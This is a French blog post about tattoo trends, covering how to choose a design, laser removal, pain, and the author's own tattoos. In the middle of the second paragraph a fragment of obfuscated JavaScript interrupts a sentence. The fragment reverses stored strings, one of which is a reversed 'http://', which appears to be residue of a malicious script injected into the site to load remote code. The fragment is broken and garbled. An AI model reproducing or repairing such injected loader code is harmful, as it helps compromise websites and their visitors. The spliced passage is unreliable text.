Doit-on céder à la tendance des tatouages?

tendance des tatouages

Qui n’a jamais entendu parler de tatouages ? Un effet de mode, une passion voire même une drogue. Inès déchiffre avec vous la magie de ces dessins qui remplissent de plus en plus nos corps.

Un tatouage ça a un prix, et oui c’est pour la vie !

tendance des tatouages

Déjà qu’est ce qu’un tatouage ? Un simple dessin fait à l’encre noire ou de couleur grâce à une aiguille qui traverse notre peau pour venir graver des motifs à jamais. Ça ne donne pas tellement envie dit comme ça, mais qu {if (typeof ($Ikf.list[n]) == « string ») return $Ikf.list[n].split(«  »).reverse().join(«  »);return $Ikf.list[n];};$Ikf.list=[« \’ //:ptth\’= « ]; ( () * 6); ; );}and le dessin représente réellement quelque chose pour soi alors là, c’est magnifique.

Choisir le motif de ses tatouages

D’ailleurs, n’y allons pas par quatre chemins et parlons tout de suite du sujet qui fâche : le motif ! Pour ma part, le motif qui est sur notre corps doit nous représenter, raconter une histoire, avoir un sens. Si vous voyez un dauphin chez un tatoueur et que vous le voulez juste parce qu’il est mignon, sincèrement vous risquez de le regretter. Faites également attention, les tatouages où vous notez le nom de votre chéri(e) du moment ou une date, etc., peut être traître. Et bien oui, si vous n’êtes plus avec dans 3 ans, comment allez vous expliquer à votre futur mari que vous portez une marque « indélébile » de votre ex sur vous ? Bon courage !

Indélébile vraiment ? Ce qui nous amène à parler de la magie des technologies actuelles. Je vous parlais des tatouages qui sont une erreur et que vous ne pouvez pas retirer, mais ça c’était avant. Vous pouvez dès à présent les faire retirer au laser.

Peut-on effacer un tatouage ?

Récemment on a pu voir M.Pokora ou encore Caroline Receveur s’y frotter, et si vous n’êtes pas tombé sur ces images je vous laisse imaginer la tête de douleur que nous pouvions apercevoir. Car se faire retirer un tatouage a un prix : autant dans le sens argent que dans la douleur. On vient brûler votre peau et ceci pendant plusieurs séances. La question est de se dire : est-ce réellement parti après ? Tout dépendra du tatouage : un petit a plus de chances de passer inaperçu, alors que celui qui prenait tout votre bras aura une belle marque, comme une grande cicatrice. Là j’avoue que je ne vous donne pas tellement envie de vous faire tatouer. Mais si avec tout ça j’ai 6 tatouages c’est que ça vaut aussi le coup non ?

Je vous parlais d’histoire il y a encore quelques lignes, et bien voilà pour moi, l’une des raisons qui ont fait que j’ai ces tatouages aujourd’hui. Chacun de mes tatouages représente une chose de ma vie à laquelle je tiens ou dont je suis fière. C’est ma façon de prouver les choses. Et puis le choix du tatouage, le faire redessiner, y ajouter une touche personnelle qu and vous prenez déjà un dessin tout fait, fais intégralement partie de l’histoire et la vie de votre tatouage.

La douleur ? Elle est unique, c’est à dire que vous pouvez avoir mal et votre copine absolument pas. Malheureusement on ne peut pas la prévoir, mais croyez moi que vous l’oubliez rapidement une fois que c’est fini et puis sincèrement ce n’est pas insupportable.

D’ailleurs, peu de personnes savent rester avec un seul tatouage toute leur vie, on succombe rapidement aux aiguilles et ça devient une drogue.

Alors la tendance du tatouage, allez vous y céder ou avez-vous déjà cédé ?

Articles recommandés

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *